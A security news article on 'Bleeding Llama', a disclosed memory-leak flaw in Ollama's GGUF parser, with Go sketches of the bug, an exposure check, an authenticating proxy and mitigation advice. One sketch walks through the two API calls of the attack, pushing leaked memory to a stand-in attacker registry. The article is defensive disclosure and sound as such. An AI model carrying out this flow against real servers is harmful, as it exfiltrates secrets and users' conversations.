‘Bleeding Llama’: Critical Ollama Vulnerability Exposes Memory on 300,000 Servers
A critical out-of-bounds read vulnerability in Ollama, dubbed Bleeding Llama, allows unauthenticated attackers to dump process memory via malicious GGUF files.

On May 12, 2026, Cyera disclosed CVE-2026-7482, a critical flaw in Ollama that allows unauthenticated remote attackers to leak process memory using a manipulated GGUF file. Dubbed "Bleeding Llama," the vulnerability affects approximately 300,000 internet-exposed servers and numerous LAN instances, turning model uploads into a vector for stealing secrets and proprietary data. The lack of default authentication, combined with a GGUF parser that fails to validate tensor dimensions, enables data exfiltration through legitimate endpoints.
- The root cause is a heap out-of-bounds read in Ollama's GGUF parser: a model file declaring inflated tensor offsets and sizes pushes reads past allocated buffers during conversion in ggml_fp16_to_fp32_row, invoked from the WriteTo() function.
- The attack requires no authentication: the /api/create endpoint accepts the malicious GGUF file, while /api/push lets the attacker exfiltrate the leaked memory to a registry under their control.
- At-risk data includes environment variables, API keys, system prompts, concurrent user conversations, and proprietary code; the vulnerability carries a CVSS score of 9.1.
- Beyond the roughly 300,000 publicly reachable servers, many instances are exposed on local networks without authentication, frequently listening on 0.0.0.0 rather than localhost.
Manipulated Tensors and Heap Out-of-Bounds Reads
The bug resides in the GGUF model loader, specifically within fs/ggml/gguf.go and server/quantization.go. According to Cyera’s analysis, the Elements() function calculates the expected tensor size based on its shape. If an attacker declares inflated offsets and sizes, the ggml_fp16_to_fp32_row conversion loop—invoked by WriteTo()—reads beyond the allocated heap buffer because the code fails to validate the actual dimensions of the uploaded file.
The issue is concentrated in the quantized tensor conversion functions, where the calculation of expected elements is not anchored to the actual size of the data blob in the file. This misalignment allows the pointer to be pushed beyond the allocated area, leveraging Go’s unsafe package to access memory regions otherwise unreachable in pure Go code.
The quantization path uses Go's unsafe package for low-level operations, bypassing the language's usual memory safety guarantees. In this workflow, a parsing flaw therefore translates into an arbitrary read of process memory, exposing environment variables, API keys, and fragments of concurrent user sessions.
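To make the bug class concrete, here is a minimal Go sketch of the pattern described above, with the missing validation added back in. The identifiers (convertRow, declaredElements) are illustrative placeholders, not Ollama's actual code; the real path runs through Elements() and the conversion invoked by WriteTo().

```go
package main

import (
	"fmt"
	"unsafe"
)

// convertRow mirrors the shape of the vulnerable pattern: the element count
// comes from attacker-controlled GGUF metadata (the declared tensor shape),
// while src is the actual data blob read from the file.
func convertRow(src []byte, declaredElements int) ([]float32, error) {
	// The missing validation: anchor the declared element count to the real
	// blob size. Without this check, the loop below walks past src.
	if declaredElements < 0 || declaredElements > len(src)/2 {
		return nil, fmt.Errorf("tensor declares %d fp16 elements but blob holds only %d bytes",
			declaredElements, len(src))
	}
	out := make([]float32, declaredElements)
	base := unsafe.Pointer(unsafe.SliceData(src))
	for i := 0; i < declaredElements; i++ {
		// unsafe.Add sidesteps Go's bounds checking, so a forged
		// declaredElements turns this into an out-of-bounds heap read.
		h := *(*uint16)(unsafe.Add(base, i*2))
		out[i] = float32(h) // stand-in for real fp16 -> fp32 decoding
	}
	return out, nil
}

func main() {
	blob := []byte{0x00, 0x3c, 0x00, 0x40} // two fp16 values
	if _, err := convertRow(blob, 1<<20); err != nil {
		fmt.Println("rejected:", err) // the inflated count is caught here
	}
}
```

The design point is that the bound must come from the file's actual data length, not from metadata the uploader controls; once the loop trusts the declared shape, Go's bounds checker never sees the access.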
The Double API Call: Leak and Exfiltration
The exploit requires no credentials. An attacker sends a specially crafted GGUF file to the /api/create endpoint, which Ollama accepts into its loading pipeline. During quantization, the tensor with falsified dimensions triggers the out-of-bounds read, dumping blocks of heap memory into the new model artifact.
The attacker then uses the /api/push endpoint to upload the resulting model to an external registry under their control. The artifact appears legitimate to the system but contains the leaked data, enabling exfiltration without side channels or additional malware on the target.
Because /api/push is a standard feature, it serves as a legitimate transport mechanism to move sensitive information out of the infrastructure once it has been embedded into the model artifact.
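For defenders modeling this traffic, the sketch below approximates the two-call flow in Go. The payload fields and hostnames are simplified assumptions, not Ollama's exact API contract, and the crafted GGUF itself is omitted; the point is the request pattern to watch for in logs, not a reproduction.

```go
package main

import (
	"fmt"
	"net/http"
	"strings"
)

// Placeholder target; 11434 is Ollama's default port.
const target = "http://victim.example:11434"

func post(path, body string) {
	resp, err := http.Post(target+path, "application/json", strings.NewReader(body))
	if err != nil {
		fmt.Println(path, "error:", err)
		return
	}
	defer resp.Body.Close()
	fmt.Println(path, "->", resp.Status)
}

func main() {
	// Step 1: /api/create ingests the crafted GGUF (payload shape is an
	// assumption; the forged tensor blob is omitted). During quantization,
	// the inflated dimensions pull heap memory into the new model artifact.
	post("/api/create", `{"model":"leak"}`)

	// Step 2: /api/push uploads the artifact, leaked bytes included, to a
	// registry the attacker controls.
	post("/api/push", `{"model":"registry.attacker.example/leak","insecure":true}`)
}
```

An unauthenticated /api/create followed shortly by /api/push to an unfamiliar registry is the signature worth alerting on.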
Unauthenticated Inference and the Attack Surface
Ollama is frequently deployed in enterprise environments for local inference on open-weights models, but default configurations often leave it overexposed. The framework does not enable authentication out of the box and is often configured to listen on 0.0.0.0 instead of localhost, opening the API to the LAN or, in many cases, the public internet.
Attack surface scans indicate approximately 300,000 publicly reachable Ollama servers. The project, which boasts over 171,000 GitHub stars and nearly 100 million Docker Hub downloads, has been widely adopted by developers and DevOps teams who must now verify the isolation of their instances from core infrastructure.
The proliferation of Ollama in CI/CD pipelines and AI development environments has led many teams to expose the API for convenience, often within Docker containers using direct port mapping. This practice, combined with the lack of native authentication, converts an inference instance into a potentially public service even when the intent was to keep it internal.
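A quick way to audit your own exposure is to probe the API from a machine that should not have access. Here is a hypothetical Go check against the real /api/tags model-listing endpoint; the address is a placeholder for your instance's LAN or public IP.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"time"
)

func main() {
	// A 200 on /api/tags means the API, including /api/create and
	// /api/push, is reachable without credentials from this host.
	client := &http.Client{Timeout: 5 * time.Second}
	resp, err := client.Get("http://192.0.2.10:11434/api/tags") // placeholder address
	if err != nil {
		fmt.Println("not reachable:", err)
		return
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(io.LimitReader(resp.Body, 2048))
	fmt.Println(resp.Status)
	fmt.Println(string(body)) // a model list confirms an open instance
}
```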
The Stakes: What a Memory Leak Reveals
The content of the leaked memory depends on what the Ollama process was handling at the time of the attack. In tests conducted by researchers, the address space revealed environment variables, API keys, system prompts, concurrent user conversations, and proprietary code undergoing inference. The CVSS score of 9.1 reflects the ability to extract high-sensitivity information without authentication and with minimal interaction.
It is not possible to determine beforehand which specific bytes will be read beyond the buffer. However, an attacker can iterate the process with different tensor configurations to increase the probability of capturing high-value memory segments. Each attempt produces a model artifact encapsulating fresh leaked data, ready for exfiltration.
"An attacker can learn basically anything about the organization from your AI inference — API keys, proprietary code, customer contracts, and much more"
Dor Attias, Cyera security researcher
Mitigation and Security Hardening
- Update immediately to Ollama 0.17.1 or later to resolve the vulnerability.
- Verify the instance's binding address, disabling 0.0.0.0 and restricting access to localhost or trusted network segments; since there is no native authentication, consider fronting the instance with an authenticating proxy (see the sketch after this list).
- Rotate any API keys, tokens, and credentials that were present in memory, assuming they may have been compromised if the server was internet-facing.
- Isolate inference instances from the rest of the corporate network, applying firewalls and segmentation to limit the attack surface even within the LAN.
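Because Ollama ships no native authentication, a common stopgap beyond binding the service to loopback (via the OLLAMA_HOST environment variable) is an authenticating reverse proxy. A minimal Go sketch, assuming an operator-chosen secret in a hypothetical PROXY_TOKEN variable:

```go
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
	"os"
)

func main() {
	// Ollama itself stays on loopback (e.g. OLLAMA_HOST=127.0.0.1:11434);
	// only this proxy is exposed to the network.
	upstream, err := url.Parse("http://127.0.0.1:11434")
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(upstream)
	token := os.Getenv("PROXY_TOKEN") // operator-chosen secret; name is illustrative

	auth := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		// Reject anything without the bearer token before it can reach
		// /api/create or /api/push.
		want := "Bearer " + token
		got := r.Header.Get("Authorization")
		if token == "" || subtle.ConstantTimeCompare([]byte(got), []byte(want)) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		proxy.ServeHTTP(w, r)
	})

	log.Fatal(http.ListenAndServe(":8443", auth))
}
```

This is a sketch of the pattern, not a hardened gateway; in production the same role is usually filled by an existing ingress or API gateway with TLS and credential management.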
The Bleeding Llama case is not a traditional web server vulnerability; it is a point where the AI model supply chain meets the fragility of parsing code. When a model file becomes a remote exploit and local inference lacks authentication, the security perimeter collapses at the level of a single tensor. For organizations, this means AI governance and DevOps hardening must be treated with the same urgency as any other public-facing asset.
Frequently Asked Questions
Is a LAN-only server still at risk?
Yes. The lack of default authentication allows any internal actor or compromised process to invoke /api/create and /api/push. LAN segmentation reduces, but does not eliminate, the threat.
Does the GGUF file need to mimic a known model?
No. The /api/create endpoint accepts GGUF files with arbitrary metadata, and Ollama processes the declared tensor shapes without validating them against the actual file size, so the forged file passes through the system unnoticed.
Is the leaked data viewable in plain text within the exfiltrated model?
Yes. The heap memory read past the buffer is embedded in the model artifact; once the model is pushed to an external registry, the attacker can extract the data outside the compromised infrastructure.
Information has been verified against cited sources and is current as of the time of publication.
Sources
- https://thehackernews.com/2026/05/ollama-out-of-bounds-read-vulnerability.html
- https://www.csoonline.com/article/4168584/ollama-vulnerability-highlights-danger-of-ai-frameworks-with-unrestricted-access.html
- https://geekfence.com/ollama-out-of-bounds-read-vulnerability-allows-remote-process-memory-leak/
- https://letsdatascience.com/news/ollama-vulnerability-exposes-remote-process-memory-caf67e65
- https://www.cyera.com/research/bleeding-llama-critical-unauthenticated-memory-leak-in-ollama